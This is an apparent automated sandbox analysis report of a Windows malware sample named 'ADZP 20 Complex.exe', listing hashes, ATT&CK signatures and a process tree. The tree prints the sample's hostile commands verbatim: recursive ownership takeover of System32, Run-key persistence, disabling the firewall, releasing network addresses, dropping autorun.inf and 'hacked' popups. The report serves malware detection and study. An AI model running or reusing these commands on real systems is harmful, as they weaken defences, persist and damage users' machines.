6ca11c8b6442db97c02f3b0f73db61f58c96d52e8a880e33abee5b10807d993f

Analysis

max time kernel
1s
max time network
276s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
10-05-2024 23:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ADZP 20 Complex.exe
Size

106KB
MD5

8b6a377f9a67d5482a8eba5708f45bb2
SHA1

7197436525e568606850ee5e033c43aea1c3bc91
SHA256

6ca11c8b6442db97c02f3b0f73db61f58c96d52e8a880e33abee5b10807d993f
SHA512

644e51798399168530b05e629b414dd80cac678bd3c8d4a5d164f55736a2b2fd380d3ca4640f7a034c8f043c06b1527b473e2d17da088d5e97de6ea04120dd72
SSDEEP

3072:v7DhdC6kzWypvaQ0FxyNTBfqMXERseQF8:vBlkZvaF4NTBSAesPF8

Score

8^/10

discovery evasion exploit

Malware Config

Signatures

Modifies Windows Firewall 2 TTPs 12 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid	process
11556	netsh.exe
8752	netsh.exe
12312	netsh.exe
9296	netsh.exe
9436	netsh.exe
12844	netsh.exe
13232	netsh.exe
10196	netsh.exe
12120	netsh.exe
15240	netsh.exe
12868	netsh.exe
8972	netsh.exe

Possible privilege escalation attempt 64 IoCs

exploit

Processes:

takeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exe

pid	process
5148	takeown.exe
14076	takeown.exe
14860	icacls.exe
5816	takeown.exe
1316	takeown.exe
6044	takeown.exe
2120	icacls.exe
5780	takeown.exe
636	icacls.exe
13820	takeown.exe
12464	takeown.exe
13192	icacls.exe
14772	takeown.exe
12788	takeown.exe
11468	icacls.exe
15256	takeown.exe
9112	icacls.exe
8376	takeown.exe
7928	takeown.exe
11376	icacls.exe
11780	takeown.exe
8092	takeown.exe
12496	icacls.exe
14320	icacls.exe
14772	icacls.exe
10380	takeown.exe
11928	takeown.exe
13464	icacls.exe
14200	icacls.exe
8	icacls.exe
4232	takeown.exe
6408	icacls.exe
9112	takeown.exe
14448	takeown.exe
8076	icacls.exe
4948	takeown.exe
6076	takeown.exe
9456	takeown.exe
15228	icacls.exe
8108	takeown.exe
13280	icacls.exe
6416	takeown.exe
9720	icacls.exe
14064	icacls.exe
9372	icacls.exe
14752	icacls.exe
15172	takeown.exe
14316	takeown.exe
5772	icacls.exe
3928	takeown.exe
4984	takeown.exe
5252	icacls.exe
12708	icacls.exe
8464	takeown.exe
14736	takeown.exe
4340	icacls.exe
3592	icacls.exe
11412	takeown.exe
7128	takeown.exe
15068	takeown.exe
11840	takeown.exe
13984	icacls.exe
5372	icacls.exe
14296	takeown.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation cmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	cmd.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
8	icacls.exe
15228	icacls.exe
7928	takeown.exe
9580	icacls.exe
3860	icacls.exe
5148	takeown.exe
6416	takeown.exe
15172	takeown.exe
4948	takeown.exe
15068	takeown.exe
3592	icacls.exe
13388	takeown.exe
11840	takeown.exe
5252	icacls.exe
14200	icacls.exe
12496	icacls.exe
2536	takeown.exe
2832	takeown.exe
8020	icacls.exe
5428	takeown.exe
1180	takeown.exe
636	icacls.exe
9124	icacls.exe
2380	takeown.exe
4508	takeown.exe
13236	takeown.exe
14448	takeown.exe
8092	takeown.exe
10872	takeown.exe
14840	icacls.exe
4584	takeown.exe
11412	takeown.exe
14076	takeown.exe
9848	takeown.exe
13280	icacls.exe
3928	takeown.exe
15256	takeown.exe
11780	takeown.exe
11928	takeown.exe
4764	takeown.exe
5780	takeown.exe
7600	takeown.exe
4232	takeown.exe
12460	icacls.exe
1032	icacls.exe
4340	icacls.exe
14904	takeown.exe
2120	icacls.exe
1184	icacls.exe
6736	icacls.exe
13820	takeown.exe
5372	icacls.exe
8464	takeown.exe
12868	icacls.exe
14772	takeown.exe
8104	icacls.exe
4984	takeown.exe
9500	icacls.exe
6844	takeown.exe
13464	icacls.exe
7128	takeown.exe
14056	takeown.exe
8376	takeown.exe
8540	takeown.exe

Drops autorun.inf file 1 TTPs 2 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

Processes:

cmd.exeattrib.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe

Drops file in System32 directory 2 IoCs

Processes:

cmd.exe

description ioc process

File created C:\Windows\System32\Twain_20.dll cmd.exe
File opened for modification C:\Windows\System32\Twain_20.dll cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe

Gathers network information 2 TTPs 18 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exe

pid	process
4764	ipconfig.exe
5284	ipconfig.exe
8908	ipconfig.exe
2312	ipconfig.exe
3240	ipconfig.exe
3092	ipconfig.exe
5876	ipconfig.exe
14452	ipconfig.exe
8948	ipconfig.exe
9848	ipconfig.exe
10688	ipconfig.exe
9624	ipconfig.exe
15068	ipconfig.exe
8848	ipconfig.exe
7328	ipconfig.exe
6036	ipconfig.exe
7852	ipconfig.exe
14436	ipconfig.exe

Kills process with taskkill 17 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
5160	taskkill.exe
7324	taskkill.exe
4788	taskkill.exe
12520	taskkill.exe
15088	taskkill.exe
8804	taskkill.exe
9916	taskkill.exe
14692	taskkill.exe
8648	taskkill.exe
12440	taskkill.exe
13968	taskkill.exe
4868	taskkill.exe
1956	taskkill.exe
2560	taskkill.exe
4704	taskkill.exe
10396	taskkill.exe
15076	taskkill.exe

Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings cmd.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

taskkill.exetakeown.exe

description pid process

Token: SeDebugPrivilege 4868 taskkill.exe
Token: SeTakeOwnershipPrivilege 4984 takeown.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings	cmd.exe

description	pid	process
Token: SeDebugPrivilege	4868	taskkill.exe
Token: SeTakeOwnershipPrivilege	4984	takeown.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

ADZP 20 Complex.execmd.execmd.exe

description	pid	process	target process
PID 216 wrote to memory of 1696	216	ADZP 20 Complex.exe	cmd.exe
PID 216 wrote to memory of 1696	216	ADZP 20 Complex.exe	cmd.exe
PID 1696 wrote to memory of 4756	1696	cmd.exe	cmd.exe
PID 1696 wrote to memory of 4756	1696	cmd.exe	cmd.exe
PID 1696 wrote to memory of 4904	1696	cmd.exe	cmd.exe
PID 1696 wrote to memory of 4904	1696	cmd.exe	cmd.exe
PID 1696 wrote to memory of 1908	1696	cmd.exe	WScript.exe
PID 1696 wrote to memory of 1908	1696	cmd.exe	WScript.exe
PID 1696 wrote to memory of 2712	1696	cmd.exe	cmd.exe
PID 1696 wrote to memory of 2712	1696	cmd.exe	cmd.exe
PID 1696 wrote to memory of 4936	1696	cmd.exe	reg.exe
PID 1696 wrote to memory of 4936	1696	cmd.exe	reg.exe
PID 1696 wrote to memory of 1016	1696	cmd.exe	reg.exe
PID 1696 wrote to memory of 1016	1696	cmd.exe	reg.exe
PID 1696 wrote to memory of 4764	1696	cmd.exe	ipconfig.exe
PID 1696 wrote to memory of 4764	1696	cmd.exe	ipconfig.exe
PID 1696 wrote to memory of 4868	1696	cmd.exe	taskkill.exe
PID 1696 wrote to memory of 4868	1696	cmd.exe	taskkill.exe
PID 2712 wrote to memory of 4984	2712	cmd.exe	takeown.exe
PID 2712 wrote to memory of 4984	2712	cmd.exe	takeown.exe
PID 1696 wrote to memory of 2932	1696	cmd.exe	attrib.exe
PID 1696 wrote to memory of 2932	1696	cmd.exe	attrib.exe
PID 1696 wrote to memory of 396	1696	cmd.exe	WScript.exe
PID 1696 wrote to memory of 396	1696	cmd.exe	WScript.exe
PID 1696 wrote to memory of 4964	1696	cmd.exe	WScript.exe
PID 1696 wrote to memory of 4964	1696	cmd.exe	WScript.exe
PID 1696 wrote to memory of 2144	1696	cmd.exe	WScript.exe
PID 1696 wrote to memory of 2144	1696	cmd.exe	WScript.exe
PID 1696 wrote to memory of 2044	1696	cmd.exe	WScript.exe
PID 1696 wrote to memory of 2044	1696	cmd.exe	WScript.exe
PID 1696 wrote to memory of 5012	1696	cmd.exe	WScript.exe
PID 1696 wrote to memory of 5012	1696	cmd.exe	WScript.exe

Views/modifies file attributes 1 TTPs 15 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
13732	attrib.exe
2932	attrib.exe
8896	attrib.exe
9308	attrib.exe
10320	attrib.exe
5128	attrib.exe
9760	attrib.exe
14360	attrib.exe
7124	attrib.exe
5360	attrib.exe
9064	attrib.exe
5572	attrib.exe
4680	attrib.exe
2668	attrib.exe
8784	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe" cmd /k "taskkill /im cmd.exe /f"
1⤵
- Suspicious use of WriteProcessMemory
PID:216
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\46AE.tmp\46AF.tmp\46B0.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe" cmd /k "taskkill /im cmd.exe /f""
  2⤵
  - Checks computer location settings
  - Drops autorun.inf file
  - Drops file in System32 directory
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Twain_20.cmd
    3⤵
    PID:4756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Twain_20.cmd
    3⤵
    PID:4904
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
    3⤵
    PID:1908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Taskdl.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2712
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32" /r
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:4984
- - C:\Windows\system32\reg.exe
    reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
    3⤵
    PID:4936
- - C:\Windows\system32\reg.exe
    reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
    3⤵
    PID:1016
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:4764
- - C:\Windows\system32\taskkill.exe
    taskkill /im DiskPart /f
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4868
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h *.*
    3⤵
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:2932
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
    3⤵
    PID:396
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
    3⤵
    PID:4964
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
    3⤵
    PID:2144
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
    3⤵
    PID:2044
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
    3⤵
    PID:5012
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
    3⤵
    PID:1368
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
    3⤵
    PID:772
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
    3⤵
    PID:5116
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
    3⤵
    PID:2260
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
    3⤵
    PID:1080
- - C:\Windows\system32\msg.exe
    msg * Virus Detectado
    3⤵
    PID:4780
- - C:\Windows\system32\msg.exe
    msg * Virus Detectado
    3⤵
    PID:4464
- - C:\Windows\system32\msg.exe
    msg * Has Sido Hackeado!
    3⤵
    PID:2020
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:2816
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\51C9.tmp\51CA.tmp\51CB.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      PID:448
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:5212
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:5432
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        5⤵
        
        PID:5848
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:5964
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4948
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:3744
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:1644
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:3240
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        5⤵
        Kills process with taskkill
        
        PID:1956
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Views/modifies file attributes
        
        PID:4680
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:6092
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:4280
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:5136
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:2752
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:2952
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:5192
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:1732
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:2392
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:1088
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:5688
    - - C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        5⤵
        
        PID:5996
    - - C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        5⤵
        
        PID:2668
    - - C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        5⤵
        
        PID:5692
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:6280
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B769.tmp\B76A.tmp\B76B.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:6548
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:7908
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:8160
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:6480
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:8284
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Modifies file permissions
        
        PID:8540
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:8588
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:8780
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:8948
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        
        PID:4788
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:8784
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:9744
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:9984
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:10208
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:4608
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:6288
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:9936
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:10432
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:10652
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:10904
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:11256
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        7⤵
        
        PID:920
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        7⤵
        
        PID:5040
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        7⤵
        
        PID:8556
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:8216
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3212.tmp\3213.tmp\3214.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:11440
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:10644
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:11424
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:11628
        
        C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        7⤵
        
        PID:11832
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:12136
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5645.tmp\5645.tmp\5646.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:12584
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        9⤵
        
        PID:8016
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        9⤵
        Modifies Windows Firewall
        
        PID:8752
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        9⤵
        
        PID:12520
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:9272
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Modifies file permissions
        
        PID:13388
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        9⤵
        
        PID:11048
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        9⤵
        
        PID:2424
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        9⤵
        Gathers network information
        
        PID:14436
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        9⤵
        Kills process with taskkill
        
        PID:15088
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        9⤵
        Views/modifies file attributes
        
        PID:14360
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:11816
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:12380
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:12796
        
        C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        7⤵
        
        PID:13068
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:764
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\81A9.tmp\81AA.tmp\81BB.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:13468
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        9⤵
        
        PID:9268
        
        C:\Windows\system32\reg.exe
        
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
        10⤵
        
        PID:14288
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        9⤵
        Modifies Windows Firewall
        
        PID:12868
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        9⤵
        
        PID:13020
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:3828
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:13320
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:13632
        
        C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        7⤵
        
        PID:13956
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:6292
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:6340
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:6364
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:6556
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:6732
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C081.tmp\C082.tmp\C083.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:6544
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:9044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:9052
        
